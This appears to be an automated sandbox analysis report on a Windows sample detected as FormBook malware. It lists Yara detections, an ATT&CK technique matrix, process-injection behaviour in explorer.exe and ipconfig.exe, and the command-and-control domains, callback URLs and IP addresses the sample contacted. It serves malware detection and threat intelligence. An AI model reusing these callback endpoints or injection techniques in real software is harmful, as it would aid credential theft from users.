          Source: Yara matchFile source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion2OS Credential DumpingSecurity Software Discovery121Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 452667 Sample: v8kZUFgdD4.exe Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 35 www.wthcoffee.com 2->35 37 www.cwdelrio.com 2->37 39 wthcoffee.com 2->39 47 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 4 other signatures 2->53 11 v8kZUFgdD4.exe 2->11         started        signatures3 process4 signatures5 61 Detected unpacking (changes PE section rights) 11->61 63 Maps a DLL or memory area into another process 11->63 65 Tries to detect virtualization through RDTSC time measurements 11->65 14 v8kZUFgdD4.exe 11->14         started        process6 signatures7 67 Modifies the context of a thread in another process (thread injection) 14->67 69 Maps a DLL or memory area into another process 14->69 71 Sample uses process hollowing technique 14->71 73 Queues an APC in another process (thread injection) 14->73 17 explorer.exe 14->17 injected process8 dnsIp9 29 jorgeporcayo.com 162.241.62.54, 49763, 80 UNIFIEDLAYER-AS-1US United States 17->29 31 doityourselfism.com 169.62.77.158, 49752, 80 SOFTLAYERUS United States 17->31 33 14 other IPs or domains 17->33 43 System process connects to network (likely due to code injection or exploit) 17->43 45 Uses ipconfig to lookup or modify the Windows network settings 17->45 21 ipconfig.exe 12 17->21         started        signatures10 process11 dnsIp12 41 www.aizaibali.com 21->41 55 Modifies the context of a thread in another process (thread injection) 21->55 57 Maps a DLL or memory area into another process 21->57 59 Tries to detect virtualization through RDTSC time measurements 21->59 25 cmd.exe 1 21->25         started        signatures13 process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          v8kZUFgdD4.exe38%VirustotalBrowse

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.ipconfig.exe.3ac7960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.v8kZUFgdD4.exe.2190000.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          7.2.ipconfig.exe.11406b0.0.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.v8kZUFgdD4.exe.21d0000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.v8kZUFgdD4.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.1.v8kZUFgdD4.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          extinctionbrews.com5%VirustotalBrowse
          www.aizaibali.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.okinawarongnho.com/dy8g/?i0GDM=uor47PkOoKkLY099HuArMxw1XFE/ncsTlzCE/ODY21NzZk1xVsb5QvrTgLDn7S7AYBCRuXEk2w==&0X=C6Ah3vPx0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.doityourselfism.com/dy8g/?i0GDM=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&0X=C6Ah3vPx0%Avira URL Cloudsafe
          http://www.findfoodshop.com/dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPx100%Avira URL Cloudmalware
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.scuolatua.com/dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3+VBHaRIBYykQk9iPNEqtroWJ/WwLhcg==&0X=C6Ah3vPx0%Avira URL Cloudsafe
          http://www.extinctionbrews.com/dy8g/?i0GDM=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&0X=C6Ah3vPx0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.invisiongc.net/dy8g/?i0GDM=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A==&0X=C6Ah3vPx100%Avira URL Cloudmalware
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          www.extinctionbrews.com/dy8g/0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.ecofingers.com/dy8g/?i0GDM=X9Az7RthaT8xdqkxQ6tJRjQeFUHqBPh6fb7YU5dnwYv1rghxnAYW3P4f0krKlocv9Wl7uwWiww==&0X=C6Ah3vPx0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.jorgeporcayo.com/dy8g/?i0GDM=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImUVNZCFSYJzAIvZikA==&0X=C6Ah3vPx0%Avira URL Cloudsafe
          http://www.scuolatua.com:80/dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM30%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          extinctionbrews.com
          34.102.136.180
          truefalseunknown
          jorgeporcayo.com
          162.241.62.54
          truetrue
            unknown
            www.aizaibali.com
            154.88.31.204
            truetrueunknown
            invisiongc.net
            34.102.136.180
            truefalse
              unknown
              www.scuolatua.com
              62.149.128.40
              truetrue
                unknown
                www.findfoodshop.com
                119.59.120.26
                truetrue
                  unknown
                  doityourselfism.com
                  169.62.77.158
                  truetrue
                    unknown
                    okinawarongnho.com
                    103.138.88.11
                    truetrue
                      unknown
                      www.ecofingers.com
                      52.58.78.16
                      truetrue
                        unknown
                        wthcoffee.com
                        184.168.131.241
                        truetrue
                          unknown
                          www.wthcoffee.com
                          unknown
                          unknowntrue
                            unknown
                            www.oikoschain.com
                            unknown
                            unknowntrue
                              unknown
                              www.xn--vuq722jwngjre.com
                              unknown
                              unknowntrue
                                unknown
                                www.extinctionbrews.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.doityourselfism.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.cwdelrio.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.invisiongc.net
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.jorgeporcayo.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.okinawarongnho.com
                                          unknown
                                          unknowntrue
                                            unknown

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.okinawarongnho.com/dy8g/?i0GDM=uor47PkOoKkLY099HuArMxw1XFE/ncsTlzCE/ODY21NzZk1xVsb5QvrTgLDn7S7AYBCRuXEk2w==&0X=C6Ah3vPxtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.doityourselfism.com/dy8g/?i0GDM=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&0X=C6Ah3vPxtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.findfoodshop.com/dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPxtrue
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://www.scuolatua.com/dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3+VBHaRIBYykQk9iPNEqtroWJ/WwLhcg==&0X=C6Ah3vPxtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.extinctionbrews.com/dy8g/?i0GDM=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&0X=C6Ah3vPxfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.invisiongc.net/dy8g/?i0GDM=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A==&0X=C6Ah3vPxfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            www.extinctionbrews.com/dy8g/true
                                            • Avira URL Cloud: safe
                                            low
                                            http://www.ecofingers.com/dy8g/?i0GDM=X9Az7RthaT8xdqkxQ6tJRjQeFUHqBPh6fb7YU5dnwYv1rghxnAYW3P4f0krKlocv9Wl7uwWiww==&0X=C6Ah3vPxtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.jorgeporcayo.com/dy8g/?i0GDM=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImUVNZCFSYJzAIvZikA==&0X=C6Ah3vPxtrue
                                            • Avira URL Cloud: safe
                                            unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000005.00000000.343561590.000000000095C000.00000004.00000020.sdmpfalse
                                              high
                                              http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.fontbureau.comexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.fontbureau.com/designersGexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.fontbureau.com/designers/?explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.founder.com.cn/cn/bTheexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers?explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.tiro.comexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.goodfont.co.krexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.carterandcone.comlexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.sajatypeworks.comexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.typography.netDexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.founder.com.cn/cn/cTheexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://fontfabrik.comexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.founder.com.cn/cnexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.jiyu-kobo.co.jp/explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://www.fonts.comexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  http://www.sandoll.co.krexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.urwpp.deDPleaseexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.zhongyicts.com.cnexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.sakkal.comexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.scuolatua.com:80/dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3ipconfig.exe, 00000007.00000002.601572909.0000000003C42000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown

                                                                  Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  52.58.78.16
                                                                  www.ecofingers.comUnited States
                                                                  16509AMAZON-02UStrue
                                                                  62.149.128.40
                                                                  www.scuolatua.comItaly
                                                                  31034ARUBA-ASNITtrue
                                                                  162.241.62.54
                                                                  jorgeporcayo.comUnited States
                                                                  46606UNIFIEDLAYER-AS-1UStrue
                                                                  169.62.77.158
                                                                  doityourselfism.comUnited States
                                                                  36351SOFTLAYERUStrue
                                                                  34.102.136.180
                                                                  extinctionbrews.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  103.138.88.11
                                                                  okinawarongnho.comViet Nam
                                                                  45538ODS-AS-VNOnlinedataservicesVNtrue
                                                                  154.88.31.204
                                                                  www.aizaibali.comSeychelles
                                                                  40065CNSERVERSUStrue
                                                                  119.59.120.26
                                                                  www.findfoodshop.comThailand
                                                                  56067METRABYTE-TH453LadplacoutJorakhaebuaTHtrue

                                                                  General Information

                                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                                  Analysis ID:452667
                                                                  Start date:22.07.2021
                                                                  Start time:17:41:18
                                                                  Joe Sandbox Product:CloudBasic
                                                                  Overall analysis duration:0h 10m 46s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:light
                                                                  Sample file name:v8kZUFgdD4.exe
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                  Number of analysed new started processes analysed:28
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • HDC enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.evad.winEXE@7/0@16/8
                                                                  EGA Information:Failed
                                                                  HDC Information:
                                                                  • Successful, ratio: 19.7% (good quality ratio 16.8%)
                                                                  • Quality average: 71.2%
                                                                  • Quality standard deviation: 34.6%
                                                                  HCA Information:
                                                                  • Successful, ratio: 97%
                                                                  • Number of executed functions: 0
                                                                  • Number of non-executed functions: 0
                                                                  Cookbook Comments:
                                                                  • Adjust boot time
                                                                  • Enable AMSI
                                                                  • Found application associated with file extension: .exe
                                                                  Warnings:
                                                                  Show All
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 104.43.193.48, 13.88.21.125, 92.122.145.220, 104.42.151.234, 52.147.198.201, 20.82.209.183, 173.222.108.226, 173.222.108.210, 51.103.5.186, 52.251.79.25, 40.112.88.60, 80.67.82.235, 80.67.82.211, 23.35.236.56, 20.82.210.154
                                                                  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                  • Not all processes where analyzed, report is missing behavior information

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  No simulations

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  52.58.78.16mal.exeGet hashmaliciousBrowse
                                                                  • www.sarahcarver.com/sm3l/?y0DdGli=yq5bXiAgrpTP0Cl4DWGobHu0GmgEguW+SJypzbO1DFimS8AGhR5rfP7J/muem3koPRQw&ixo0sr=dFQtk
                                                                  PO_2005042020.exeGet hashmaliciousBrowse
                                                                  • www.ameri.loans/dt9v/?WJBxWP=43H5ZqapR2U2c+53UedyyCnf/tAQMSihskCSywJ+5iH1soBQckHw2KLayvSLN2TiqtAl&tFQp=7nutZ
                                                                  Invoice-Scancopy.docxGet hashmaliciousBrowse
                                                                  • www.ess.xyz/k2m6/?-Z=5jztvT3H&eXrxUtg=48Fqwwc0TpMWpKdyZvZdJZLrLfV5OyuFq874jIM8N+PC/lGntTttinAjIfEcXvLx+ei6yw==
                                                                  ORDER 200VPS.xlsxGet hashmaliciousBrowse
                                                                  • www.aideliveryrobot.com/p2io/?bH=xikLqsOKlSWJt+SrZg8c4HdBraEMa/77ZWZXTseglAkSxnPi++5EYIqDKkXYJ2G/5JhnXw==&XV88=urL00v88onXp_
                                                                  LAGIk5ic3R.exeGet hashmaliciousBrowse
                                                                  • www.quickinterchangeableguitars.com/0mq2/?fDHX8=WleDGb2XfF7tUd0&o6ATq=PrDeBWOvFm4C1uiT5+TkruHjtP7PYgIXMNukuC19GOh7I/zDw4hvhKpfG3R3/sFyDX1r
                                                                  3456_RFQ998778.xlsxGet hashmaliciousBrowse
                                                                  • www.jmbossvodka.com/gno4/?-ZS=YdtY2bnE57KZ5WgSsIzeA3q4iz7LDafvQmGQHnumUAAK16ZgD7FJS8vZbyZDCBBis2h0IQ==&e4=8pNH
                                                                  Payment_Breakdown_pdf.exeGet hashmaliciousBrowse
                                                                  • www.onlineappointmentsystem.com/ons5/?3f-=nVZuwkx8QtdDg8xrBBXA1XtU0x+dB6tS53/N0IsFnt8ggCwz+Hq54W4pscUCIRDkRkLu&YR-0=y48tk6C
                                                                  owen.exeGet hashmaliciousBrowse
                                                                  • www.syeioraom.com/a8si/?g2J4yx=-Zg4GfE&S4=2gqxBbxdCHAGZiW08HusmFGOvmsXdbr8Hht+pti8HbRhpYj5OmStbJLwswr0+a+SFvsW
                                                                  FASMW.EXEGet hashmaliciousBrowse
                                                                  • www.elprado.life/cabq/?iZ=2di86hvH&h6R8xP=7Gl0G44haCAnuWN+7VTog1C/raccTS26kDhalZqSPKgWVaNcTe2u+1G8JtOTpBZpOa50
                                                                  po_order_item_29062021.exeGet hashmaliciousBrowse
                                                                  • www.monkeyhunter.com/rht3/?y0=Btx4&RV_l=AlhR87CcH+GN+pIusHgdFqhLxnRwmvwNBNp0g7IcE6I1zhj/b7sMRAUJpklc7EpOOxOv
                                                                  Minutes of Meeting 22062021.exeGet hashmaliciousBrowse
